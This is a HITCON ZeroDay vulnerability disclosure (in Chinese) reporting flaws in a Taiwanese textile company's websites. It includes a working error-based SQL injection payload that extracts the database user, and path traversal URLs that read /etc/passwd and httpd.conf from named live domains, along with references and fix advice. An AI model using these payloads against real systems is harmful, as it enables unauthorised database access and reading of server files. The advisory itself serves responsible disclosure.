威齊織品科技有限公司多個弱點 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2017-00934
  •  發信 Vendor: 威齊織品科技有限公司
  • Title: 威齊織品科技有限公司多個弱點
  • Introduction: All Site Error-Based SQL Injection 及 Path Traversal 任意檔案下載

處理狀態

目前狀態

公開
Last Update : 2017/12/26
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2017/10/26 10:30:55 : 新提交 (由 Ʋïȭɬȩȵŝŏűɭ 更新此狀態)
  • 2017/10/26 10:31:47 : 新提交 (由 Ʋïȭɬȩȵŝŏűɭ 更新此狀態)
  • 2017/10/26 10:34:06 : 新提交 (由 Ʋïȭɬȩȵŝŏűɭ 更新此狀態)
  • 2017/10/27 00:23:23 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2017/10/28 11:42:09 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2017/10/28 11:42:10 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2017/10/28 11:42:11 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2017/12/26 03:00:10 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2017-00934
  • 通報者:violensoul (Ʋïȭɬȩȵŝŏűɭ)
  • 風險:高
  • 類型:資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

http://www.wikis.com.tw/module/szWeb/List.php?sPilot=page-9
http://www.gildan.com.tw/DownLoad.php?fDir=site/521afd2e115de/file/web_521aff7b13646&fName=DownloadDetial_59cf5e9d61daa_1506762397&newName=GILDAN%20DM2017-2018%E5%A2%9E%E8%A8%82%E4%BA%8C%E7%89%88-170929.pdf

敘述

威齊織品科技有限公司多個弱點

-Error-Based SQL Injection

LOCATION:
http://www.wikis.com.tw/module/szWeb/List.php?sPilot=page-9
DEMO PAYLOAD:
http://www.wikis.com.tw/module/szWeb/List.php?sPilot=page-9%27%20AND%20%28SELECT%201%20FROM%28SELECT%20COUNT%28%2a%29%2Cconcat%28CONCAT%28user%28%29%29%2C0x0%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27A%27%3D%27A

Error中可觀察Duplicate entry之值為設定好之資料庫使用者之函式回傳值
全站具SQL查詢語句功能之參數皆可遭SQL Injecion攻擊
此問題為Critical issue,因資料庫使用者名稱含有ERP字樣,資料庫中可能含有廠商ERP資料


-Path Traversal任意檔案下載

LOCATION:
http://www.gildan.com.tw/DownLoad.php?fDir=site/521afd2e115de/file/web_521aff7b13646&fName=DownloadDetial_59cf5e9d61daa_1506762397&newName=GILDAN%20DM2017-2018%E5%A2%9E%E8%A8%82%E4%BA%8C%E7%89%88-170929.pdf
DEMO PAYLOAD:
http://www.gildan.com.tw/DownLoad.php?fDir=../../../../../../../../../../../../etc/&fName=passwd&newName=test.txt
http://www.gildan.com.tw/DownLoad.php?fDir=/etc/httpd/conf/&fName=httpd.conf&newName=httpd.conf

因可讀取httpd.conf因而得知此站台含有多個VIrtual Host
站台皆共用後端PHP程式,分別開發模板

修補建議

Error-Based SQL Injection
以第二個弱點可得知全站之SQL Query均未做安全保護
建議檢視"全站"之SQL Query並調整使用Prepare Statement

Path Traversal任意檔案下載
將fDir變數留在後端處理並限制資料夾位置,勿將參數傳暴露至Client端

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;